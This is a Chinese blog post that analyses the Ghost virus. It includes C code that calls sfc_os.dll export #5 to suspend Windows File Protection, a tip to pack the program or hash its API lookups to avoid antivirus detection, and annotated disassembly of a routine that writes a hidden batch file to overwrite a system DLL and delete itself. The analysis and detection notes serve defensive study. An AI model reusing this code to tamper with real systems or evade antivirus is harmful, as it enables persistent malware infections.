
利用 sfc_os.dll #5号 api 关闭系统文件保护 篡改系统文件

2012-10-16 22:28 288 查看
Windows文件保护对于恶意程序来说是个烦人的东西。尤其是当你想修改系统文件时它就起到保护作用了。这个sfc_os.dll #5号 api也是我在病毒分析时遇到的。它的作用是关闭系统文件保护60秒。

下面给出一个C的源码样例。利用这个时为了避免被查杀最好给程序加壳或者用hash来查找api。

//c code demo
// Prototype used for sfc_os.dll export #5 (the export the text calls the
// "#5 api"; it is resolved by ordinal, so no name appears in the import table).
// __stdcall, returns DWORD, takes (DWORD, PWCHAR path, DWORD). The meaning of
// param1/param3 is not documented on this page beyond the demo call below,
// which passes (0, <wide path>, -1).
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);

/*
 * Disable_WFP — demo of the sfc_os.dll ordinal-5 call described in the text.
 *
 * What the visible code does: loads sfc_os.dll, resolves export #5 by
 * ordinal ((LPCSTR)5), and calls it with (0, L"c://windows//system32//calc.exe", -1).
 * The surrounding text states the export (widely referred to as
 * SfcFileException) suspends Windows File Protection for the named file for
 * 60 seconds; nothing on this page shows how the two DWORD parameters are
 * interpreted.
 *
 * Review notes:
 *  - Neither the LoadLibrary nor the GetProcAddress result is checked; a NULL
 *    hmod or NULL function pointer crashes the caller instead of failing.
 *  - The path literal contains doubled forward slashes ("//"), not escaped
 *    backslashes; whether the callee normalises that form is not shown here.
 *  - For detection/hunting, the observable sequence is
 *    LoadLibrary("sfc_os.dll") followed by GetProcAddress(hmod, 5) by a
 *    non-system binary, followed by a write to a protected system file; the
 *    hObject/module handle is never released (no FreeLibrary).
 */
void Disable_WFP()

{
HINSTANCE hmod=LoadLibrary("sfc_os.dll");            /* not NULL-checked */
CPP SetSfcFileException;

// the function is stored at the fifth ordinal in sfc_os.dll
SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);   /* not NULL-checked */

SetSfcFileException(0, L"c://windows//system32//calc.exe",-1);   /* return value ignored */

//Now we can modify the system file in a complete stealth.

}

我再来说说我分析的这个病毒吧。这是在看雪论坛里看到的Ghost病毒，已有人分析过，但我觉得还有可以补充的地方。http://bbs.pediy.com/showthread.php?t=99266

看到上面那个关闭系统文件保护的api，可能有人就已经猜到了：这个病毒最核心的思路就是替换系统dll。对于要替换哪个系统dll，病毒作者也做了些工作。首先是检查系统是否运行了下面这些预定的服务。

UPX0:00402228 ; Service-name table the sample checks for (see the text above): if one
UPX0:00402228 ; of these services is present, the DLL backing it becomes the replacement
UPX0:00402228 ; candidate. Every entry is referenced from a contiguous dword pointer
UPX0:00402228 ; table at UPX0:0040302C..UPX0:0040306C (the DATA XREFs); aBits has no
UPX0:00402228 ; xref shown here. The names match Windows XP-era svchost-hosted services
UPX0:00402228 ; (presumably the netsvcs group — confirm against the sample's service
UPX0:00402228 ; enumeration code, which is not in this listing). For triage, compare the
UPX0:00402228 ; ServiceDll of each listed service against a known-good copy.
UPX0:00402228 aAppmgmt db 'AppMgmt',0 ; DATA XREF: UPX0:0040306Co
UPX0:00402230 aSchedule db 'Schedule',0 ; DATA XREF: UPX0:00403068o
UPX0:00402239 align 4
UPX0:0040223C aRemoteregistry db 'RemoteRegistry',0 ; DATA XREF: UPX0:00403064o
UPX0:0040224B align 4
UPX0:0040224C aHelpsvc db 'helpsvc',0 ; DATA XREF: UPX0:00403060o
UPX0:00402254 aCryptsvc db 'CryptSvc',0 ; DATA XREF: UPX0:0040305Co
UPX0:0040225D align 10h
UPX0:00402260 aThemes db 'Themes',0 ; DATA XREF: UPX0:00403058o
UPX0:00402267 align 4
UPX0:00402268 aBrowser db 'Browser',0 ; DATA XREF: UPX0:00403054o
UPX0:00402270 aTapisrv db 'Tapisrv',0 ; DATA XREF: UPX0:00403050o
UPX0:00402278 aNla db 'Nla',0 ; DATA XREF: UPX0:0040304Co
UPX0:0040227C aNetman db 'Netman',0 ; DATA XREF: UPX0:00403048o
UPX0:00402283 align 4
UPX0:00402284 aSsdpsrv db 'SSDPSRV',0 ; DATA XREF: UPX0:00403044o
UPX0:0040228C aUpnphost db 'upnphost',0 ; DATA XREF: UPX0:00403040o
UPX0:00402295 align 4
UPX0:00402298 aNtmssvc db 'Ntmssvc',0 ; DATA XREF: UPX0:0040303Co
UPX0:004022A0 aEventsystem db 'EventSystem',0 ; DATA XREF: UPX0:00403038o
UPX0:004022AC aXmlprov db 'xmlprov',0 ; DATA XREF: UPX0:00403034o
UPX0:004022B4 aWmdmpmsn db 'WmdmPmSN',0 ; DATA XREF: UPX0:00403030o
UPX0:004022BD align 10h
UPX0:004022C0 aFastuserswitch db 'FastUserSwitchingCompatibility',0
UPX0:004022C0 ; DATA XREF: UPX0:0040302Co
UPX0:004022DF align 10h
UPX0:004022E0 aBits db 'BITS',0 ; last entry; no DATA XREF shown in this listing

如果有，再查找与该服务对应的dll。之后就是关闭文件保护、释放资源并重写该dll。

最后是清理工作：新建一个临时文件（批处理类型）。

该批处理文件将病毒程序复制并替换系统文件，然后删除病毒程序自身。

UPX0:0040178F ; int __stdcall sub_40178F(struct _OVERLAPPED Overlapped)
UPX0:0040178F ;
UPX0:0040178F ; Review notes on this routine (the prototype above is IDA's guess):
UPX0:0040178F ;  * Purpose as visible here: build "%TEMP%\TempDel.bat", fill it with a
UPX0:0040178F ;    batch script that copies this executable over
UPX0:0040178F ;    <dll_path>\dllcache\lsasvc.dll, deletes the executable (retrying in
UPX0:0040178F ;    the :runagain loop until it is gone) and then deletes the .bat, run
UPX0:0040178F ;    it hidden via ShellExecute("open", SW_HIDE), and ExitProcess so the
UPX0:0040178F ;    batch can remove the running image.
UPX0:0040178F ;  * The -4 local named "Overlapped" is just the DWORD WriteFile fills in;
UPX0:0040178F ;    IDA's _OVERLAPPED overlay on it produces the odd prototype.
UPX0:0040178F ;    [ebp+Overlapped.anonymous_0+4] = ebp-4+8+4 = [ebp+8], i.e. the
UPX0:0040178F ;    routine's first stack argument (a mode flag; 1 = target the dllcache
UPX0:0040178F ;    copy, otherwise var_220 stays empty and the copy line has an empty
UPX0:0040178F ;    destination — how callers use that mode is not visible here).
UPX0:0040178F ;  * Only the CreateFileA result is checked; GetTempPathA,
UPX0:0040178F ;    GetModuleFileNameA, wsprintfA and WriteFile failures are ignored.
UPX0:0040178F ;  * Detection hooks grounded in this listing: TempDel.bat created in the
UPX0:0040178F ;    temp directory, a .bat started with "open"/SW_HIDE by a process that
UPX0:0040178F ;    exits immediately, and a write into system32\dllcache (WFP's restore
UPX0:0040178F ;    store, so the replacement also survives a WFP repair).
UPX0:0040178F ;  * Frame is 0x728 bytes; the listing stops at locret_40190C, so the
UPX0:0040178F ;    epilogue/retn is not shown.
UPX0:0040178F sub_40178F proc near ; CODE XREF: WinMain(x,x,x,x)+1E6p
UPX0:0040178F ; WinMain(x,x,x,x)+31Cp ...
UPX0:0040178F
UPX0:0040178F Filename = byte ptr -728h ; full path of this executable (GetModuleFileNameA)
UPX0:0040178F Buffer = byte ptr -620h ; 0x400-byte batch script text
UPX0:0040178F var_220 = byte ptr -220h ; copy destination "<dll_path>\dllcache\lsasvc.dll"
UPX0:0040178F hObject = dword ptr -114h ; handle to TempDel.bat
UPX0:0040178F Dst = byte ptr -110h ; "%TEMP%\TempDel.bat"
UPX0:0040178F Overlapped = _OVERLAPPED ptr -4 ; really a DWORD: WriteFile's lpNumberOfBytesWritten
UPX0:0040178F
UPX0:0040178F push ebp
UPX0:00401790 mov ebp, esp
UPX0:00401792 sub esp, 728h ; 0x728 bytes of locals
UPX0:00401798 or [ebp+hObject], 0FFFFFFFFh ; hObject = INVALID_HANDLE_VALUE
UPX0:0040179F push 104h ; Size
UPX0:004017A4 push 0 ; Val
UPX0:004017A6 lea eax, [ebp+Dst]
UPX0:004017AC push eax ; Dst
UPX0:004017AD call memset ; memset(Dst, 0, MAX_PATH)
UPX0:004017B2 add esp, 0Ch
UPX0:004017B5 lea eax, [ebp+Dst]
UPX0:004017BB push eax ; lpBuffer
UPX0:004017BC push 104h ; nBufferLength
UPX0:004017C1 call GetTempPathA ; Dst = temp directory (trailing backslash); return value not checked
UPX0:004017C7 push offset aTempdel_bat ; "TempDel.bat"
UPX0:004017CC lea eax, [ebp+Dst] ; dst:%temp_path%.tempdel.bat
UPX0:004017D2 push eax
UPX0:004017D3 call lstrcat ; Dst = "%TEMP%\TempDel.bat"
UPX0:004017D9 push 104h ; Size
UPX0:004017DE push 0 ; Val
UPX0:004017E0 lea eax, [ebp+Filename]
UPX0:004017E6 push eax ; Dst
UPX0:004017E7 call memset ; memset(Filename, 0, MAX_PATH)
UPX0:004017EC add esp, 0Ch
UPX0:004017EF push 104h ; nSize
UPX0:004017F4 lea eax, [ebp+Filename]
UPX0:004017FA push eax ; lpFilename
UPX0:004017FB push 0 ; hModule
UPX0:004017FD call GetModuleFileNameA ; Filename = path of this executable; result not checked
UPX0:00401803 push 104h ; Size
UPX0:00401808 push 0 ; Val
UPX0:0040180A lea eax, [ebp+var_220]
UPX0:00401810 push eax ; Dst
UPX0:00401811 call memset ; var_220 zeroed; stays empty unless the mode flag below is 1
UPX0:00401816 add esp, 0Ch
UPX0:00401819 cmp dword ptr [ebp+Overlapped.anonymous_0+4], 1 ; [ebp+8]: first argument (mode flag), see notes above
UPX0:0040181D jnz short loc_401839 ; mode != 1: leave var_220 empty
UPX0:0040181F push offset dll_path ; global; the trace below shows it held C:\WINDOWS\system32
UPX0:00401824 push offset aSDllcacheLsasv ; "%s\\dllcache\\lsasvc.dll"
UPX0:00401829 lea eax, [ebp+var_220]
UPX0:0040182F push eax ; LPSTR
UPX0:00401830 call wsprintfA ; var_220 = "<dll_path>\dllcache\lsasvc.dll"
UPX0:00401836 add esp, 0Ch
UPX0:00401839
UPX0:00401839 loc_401839: ; CODE XREF: sub_40178F+8Ej
UPX0:00401839 push 400h ; Size
UPX0:0040183E push 0 ; Val
UPX0:00401840 lea eax, [ebp+Buffer]
UPX0:00401846 push eax ; Dst
UPX0:00401847 call memset ; memset(Buffer, 0, 0x400)
UPX0:0040184C add esp, 0Ch
UPX0:0040184F lea eax, [ebp+Dst] ; wsprintfA args pushed right-to-left: Dst, Filename, Filename, var_220, Filename
UPX0:00401855 push eax ; %s #5: the .bat's own path (final "del")
UPX0:00401856 lea eax, [ebp+Filename]
UPX0:0040185C push eax ; %s #4: "if exist" check
UPX0:0040185D lea eax, [ebp+Filename]
UPX0:00401863 push eax ; %s #3: "del" target
UPX0:00401864 lea eax, [ebp+var_220]
UPX0:0040186A push eax ; %s #2: copy destination
UPX0:0040186B lea eax, [ebp+Filename]
UPX0:00401871 push eax ; %s #1: copy source
UPX0:00401872 push offset aCopyYSSRunagai ; "copy /Y \"%s\" \"%s\"\r\n:runagain\r\ndel \"%s\"\r"...
UPX0:00401877 lea eax, [ebp+Buffer]
UPX0:0040187D push eax ; LPSTR
UPX0:0040187E call wsprintfA ; copy /Y "C:\ghos y样本\Ghost.exe"
UPX0:0040187E ; "C:\WINDOWS\system32\dllcache\lsasvc.dll"..
UPX0:0040187E ; :runagain..del "C:\ghosy样本\Ghost.exe"..
UPX0:0040187E ; if exist "C\ghosy样本\Ghost.exe" goto runa gain.
UPX0:0040187E ; .del "C:\DO CUME~1\mike\LOCA LS~1\Temp\TempDe
UPX0:0040187E ;
UPX0:00401884 add esp, 1Ch ; 7 dwords popped (cdecl); wsprintfA caps output at 1024 chars = sizeof(Buffer)
UPX0:00401887 push 0 ; hTemplateFile
UPX0:00401889 push 80h ; dwFlagsAndAttributes
UPX0:0040188E push 2 ; dwCreationDisposition
UPX0:00401890 push 0 ; lpSecurityAttributes
UPX0:00401892 push 0 ; dwShareMode
UPX0:00401894 push 0C0000000h ; dwDesiredAccess
UPX0:00401899 lea eax, [ebp+Dst]
UPX0:0040189F push eax ; lpFileName
UPX0:004018A0 call CreateFileA ; create the temp .bat (CREATE_ALWAYS overwrites any existing file)
UPX0:004018A0 ; 0012EBF0 0012F224 |FileName = "C:\DOCUME~1\mike\LOCALS~1\Temp\TempDel.bat"
UPX0:004018A0 ; 0012EBF4 C0000000 |Access = GENERIC_READ|GENERIC_WRITE
UPX0:004018A0 ; 0012EBF8 00000000 |ShareMode = 0
UPX0:004018A0 ; 0012EBFC 00000000 |pSecurity = NULL
UPX0:004018A0 ; 0012EC00 00000002 |Mode = CREATE_ALWAYS
UPX0:004018A0 ; 0012EC04 00000080 |Attributes = NORMAL
UPX0:004018A0 ; 0012EC08 00000000 \hTemplateFile = NULL
UPX0:004018A0 ;
UPX0:004018A0 ;
UPX0:004018A6 mov [ebp+hObject], eax
UPX0:004018AC cmp [ebp+hObject], 0FFFFFFFFh
UPX0:004018B3 jnz short loc_4018B7
UPX0:004018B5 jmp short locret_40190C ; INVALID_HANDLE_VALUE: give up silently, no status reported
UPX0:004018B7 ; ---------------------------------------------------------------------------
UPX0:004018B7
UPX0:004018B7 loc_4018B7: ; CODE XREF: sub_40178F+124j
UPX0:004018B7 push 0 ; lpOverlapped = NULL
UPX0:004018B9 lea eax, [ebp+Overlapped]
UPX0:004018BC push eax ; lpNumberOfBytesWritten = &var_4 (IDA's "lpOverlapped" label was shifted by one push)
UPX0:004018BD lea eax, [ebp+Buffer]
UPX0:004018C3 push eax ; lpString argument for lstrlen (IDA's "lpNumberOfBytesWritten" label was shifted)
UPX0:004018C4 call lstrlen ; eax = strlen(Buffer); stdcall, pops its own argument
UPX0:004018CA push eax ; nNumberOfBytesToWrite
UPX0:004018CB lea eax, [ebp+Buffer]
UPX0:004018D1 push eax ; lpBuffer
UPX0:004018D2 push [ebp+hObject] ; hFile
UPX0:004018D8 call WriteFile ; WriteFile(hObject, Buffer, lstrlen(Buffer), &var_4, NULL); result ignored
UPX0:004018DE push [ebp+hObject] ; hObject
UPX0:004018E4 call CloseHandle ; the temp file is a batch script; its contents are shown in the trace above
UPX0:004018EA push 0 ; nShowCmd = 0 (SW_HIDE)
UPX0:004018EC push 0 ; lpDirectory = NULL
UPX0:004018EE push 0 ; lpParameters = NULL
UPX0:004018F0 lea eax, [ebp+Dst]
UPX0:004018F6 push eax ; lpFile = "%TEMP%\TempDel.bat"
UPX0:004018F7 push offset aOpen ; "open" ; lpOperation
UPX0:004018FC push 0 ; hwnd = NULL
UPX0:004018FE call p_shellexecute ; presumably a resolved ShellExecuteA pointer (name only; not shown here): runs the batch hidden
UPX0:00401904 push 0 ; uExitCode
UPX0:00401906 call ExitProcess ; image no longer in use, so the batch's del loop can succeed; never returns
UPX0:0040190C ; ---------------------------------------------------------------------------
UPX0:0040190C
UPX0:0040190C locret_40190C: ; CODE XREF: sub_40178F+126j ; epilogue/retn not included in this listing

最后还忘了说，这个病毒加的是UPX壳。脱壳也不费什么劲，我这个菜鸟就不赘述了。